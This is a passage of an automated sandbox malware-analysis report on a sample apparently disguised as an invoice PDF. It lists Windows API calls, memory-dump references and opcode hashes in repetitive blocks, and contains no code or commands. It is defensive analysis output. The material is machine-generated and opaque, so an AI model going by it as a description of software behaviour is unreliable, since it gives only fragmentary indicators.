                                                                              • Instruction Fuzzy Hash: FF2195716403056FE310EF65CC42F5BB7E8AF84708F144D2EF544AB282D6FAB9858795
                                                                              APIs
                                                                                • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0047728E
                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772A9
                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772C0
                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772D0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Long$AttributesLayered
                                                                              • String ID:
                                                                              • API String ID: 2169480361-0
                                                                              • Opcode ID: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                              • Instruction ID: faea1ea985e506ac999786301d765d91882fdca708237d94abe4bce3661c65f1
                                                                              • Opcode Fuzzy Hash: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                              • Instruction Fuzzy Hash: 5F11B431205510ABD310FB29DD45F9BB798FF91720F10862EF455E72E2C7A8AC45C7A8
                                                                              APIs
                                                                              • SendMessageW.USER32 ref: 00448CB8
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00448CE0
                                                                              • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448D19
                                                                              • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D62
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$LongWindow
                                                                              • String ID:
                                                                              • API String ID: 312131281-0
                                                                              • Opcode ID: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                              • Instruction ID: 9d6bf2a2f0cb0d5184a29e15ea511504db1ac53b4253ca88fa0f688086887250
                                                                              • Opcode Fuzzy Hash: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                              • Instruction Fuzzy Hash: B12174715053019BF3208F18D98879FB7E4FBD5325F140B2EF594962D0DBB58449C796
                                                                              APIs
                                                                              • select.WSOCK32 ref: 0045890A
                                                                              • __WSAFDIsSet.WSOCK32(00000000,00000000), ref: 00458919
                                                                              • accept.WSOCK32(00000000,00000000,00000000), ref: 00458927
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00458952
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastacceptselect
                                                                              • String ID:
                                                                              • API String ID: 385091864-0
                                                                              • Opcode ID: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                              • Instruction ID: 93f38c3b8a65fd8a68e5265ae944391143789c71a4918893f245a539b4228a7d
                                                                              • Opcode Fuzzy Hash: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                              • Instruction Fuzzy Hash: 1F2166712043019BD314EF29C842BABB7E5AFC4714F144A2EF994DB2C1DBB4A985CB99
                                                                              APIs
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00438D6F
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D82
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D9A
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438DB4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                              • Instruction ID: 707762f1bc06eebb59e9357f9c77b20c0e090dcf7cedc03b298b4f863176c0ea
                                                                              • Opcode Fuzzy Hash: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                              • Instruction Fuzzy Hash: 77113AB6204305AFD210EF58DC84F6BF7E8EBE8750F20491EF580D7290D6B1A8468BA1
                                                                              APIs
                                                                              • CreateWindowExW.USER32(?,?,?,FFFFFFFF,?,?,?,?,?,?,00400000,00000000), ref: 0043367E
                                                                              • GetStockObject.GDI32(00000011), ref: 00433695
                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 0043369F
                                                                              • ShowWindow.USER32(00000000,00000000), ref: 004336BA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CreateMessageObjectSendShowStock
                                                                              • String ID:
                                                                              • API String ID: 1358664141-0
                                                                              • Opcode ID: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                              • Instruction ID: 5bb77caae3378c1c36de35f78993aeb7f53e4fc0e9047450929301c31466c70f
                                                                              • Opcode Fuzzy Hash: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                              • Instruction Fuzzy Hash: 60114F72204A00BFD254DF55CC49F5BB3F9AFCCB01F20950DB254922A0D7B4E9418BA9
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 004441B8
                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 004441F6
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00444213
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                              • String ID:
                                                                              • API String ID: 2880819207-0
                                                                              • Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                              • Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
                                                                              • Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                              • Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6
                                                                              APIs
                                                                              • GetWindowRect.USER32(?,?), ref: 00434037
                                                                              • ScreenToClient.USER32(?,?), ref: 0043405B
                                                                              • ScreenToClient.USER32(?,?), ref: 00434085
                                                                              • InvalidateRect.USER32(?,?,?), ref: 004340A4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                                              • String ID:
                                                                              • API String ID: 357397906-0
                                                                              • Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                              • Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
                                                                              • Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                              • Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                              • String ID:
                                                                              • API String ID: 3016257755-0
                                                                              • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                              • Instruction ID: 11ead64bc5c18606fe5fffcedc2bbdf89ccfa4faa7bd693ca83be0ddd2add3a5
                                                                              • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                              • Instruction Fuzzy Hash: AA11A272500059BBCF225E85EC018EE3F66FB88354B898416FE2858131C73AC9B1AB85
                                                                              APIs
                                                                              • __wsplitpath.LIBCMT ref: 00436A45
                                                                                • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                              • __wsplitpath.LIBCMT ref: 00436A6C
                                                                              • __wcsicoll.LIBCMT ref: 00436A93
                                                                              • __wcsicoll.LIBCMT ref: 00436AB0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                              • String ID:
                                                                              • API String ID: 1187119602-0
                                                                              • Opcode ID: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                              • Instruction ID: cc447ddabc085245cf6c6bda96777749177fc915bba42f20b5b260b799017f3a
                                                                              • Opcode Fuzzy Hash: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                              • Instruction Fuzzy Hash: 690165B64043416BD724EB50D881EEBB3ED7BD8304F04C91EB5C982041FB38D24C87A6
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                              • String ID:
                                                                              • API String ID: 1597257046-0
                                                                              • Opcode ID: 3e6e4c0e3d6904c110b96eb61703f40a5b90c35020d8caf227267a531f68623b
                                                                              • Instruction ID: 9df5ee2dcc5f1a759a9cde70f7b42babd8a8bdcc369222b22224423102f690bd
                                                                              • Opcode Fuzzy Hash: 3e6e4c0e3d6904c110b96eb61703f40a5b90c35020d8caf227267a531f68623b
                                                                              • Instruction Fuzzy Hash: BFF06D32200200AFC314EB66C885E6BB3EAEBC5324F04852EF556C7791DB39F841C764
                                                                              APIs
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: DeleteDestroyObject$IconWindow
                                                                              • String ID:
                                                                              • API String ID: 3349847261-0
                                                                              • Opcode ID: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                              • Instruction ID: 3a9029eb8e47786e7dec82746d504bb216afab776d143f23dce7b1a7602128e4
                                                                              • Opcode Fuzzy Hash: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                              • Instruction Fuzzy Hash: 06F03C702006419BDB20AF65DDD8A2B77ACEF45322740456AFD04D7242DB28DC498B7D
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(?), ref: 0044B60B
                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 0044B619
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B630
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B641
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                              • String ID:
                                                                              • API String ID: 2223660684-0
                                                                              • Opcode ID: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                              • Instruction ID: 8f2921e390180aa9c6083979f061463a0462abb68b72a76a452ff5fd2bc04521
                                                                              • Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                              • Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75
                                                                              APIs
                                                                                • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                              • MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
                                                                              • LineTo.GDI32(?,00000000,00000002), ref: 004472A0
                                                                              • EndPath.GDI32(?), ref: 004472B0
                                                                              • StrokePath.GDI32(?), ref: 004472BE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                              • String ID:
                                                                              • API String ID: 2783949968-0
                                                                              • Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                              • Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
                                                                              • Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                              • Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA
                                                                              APIs
                                                                              • __getptd.LIBCMT ref: 00417D1A
                                                                                • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                              • __getptd.LIBCMT ref: 00417D31
                                                                              • __amsg_exit.LIBCMT ref: 00417D3F
                                                                              • __lock.LIBCMT ref: 00417D4F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                              • String ID:
                                                                              • API String ID: 3521780317-0
                                                                              • Opcode ID: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                              • Instruction ID: 784cd6646040312d8c3929352b57c791f513dbd9ce30c249d09a92555f0e5bc7
                                                                              • Opcode Fuzzy Hash: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                              • Instruction Fuzzy Hash: D4F06D319447089AD720FB66E4067EA32B0AF01728F11856FA4415B7D2DB3C99C08B9E
                                                                              APIs
                                                                              • GetDesktopWindow.USER32 ref: 00471144
                                                                              • GetDC.USER32(00000000), ref: 0047114D
                                                                              • GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
                                                                              • ReleaseDC.USER32(00000000,?), ref: 0047117B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                              • String ID:
                                                                              • API String ID: 2889604237-0
                                                                              • Opcode ID: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                              • Instruction ID: a1da8b046b56c0024f4e51319ca7c868ce9b42ab557c4db2e47d6af70bf9fcef
                                                                              • Opcode Fuzzy Hash: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                              • Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99
                                                                              APIs
                                                                              • GetDesktopWindow.USER32 ref: 00471102
                                                                              • GetDC.USER32(00000000), ref: 0047110B
                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
                                                                              • ReleaseDC.USER32(00000000,?), ref: 00471139
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                              • String ID:
                                                                              • API String ID: 2889604237-0
                                                                              • Opcode ID: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                              • Instruction ID: 5204c471e266b2ed5cdb435334cd6f206910ee07043e0bb223494c3f632f6575
                                                                              • Opcode Fuzzy Hash: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                              • Instruction Fuzzy Hash: 78F05E759042009FD310EF65DC5896EBBA4FB94351F104C3EFC05D2251DB7489059B99
                                                                              APIs
                                                                              • SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                              • GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                              • GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                              • AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
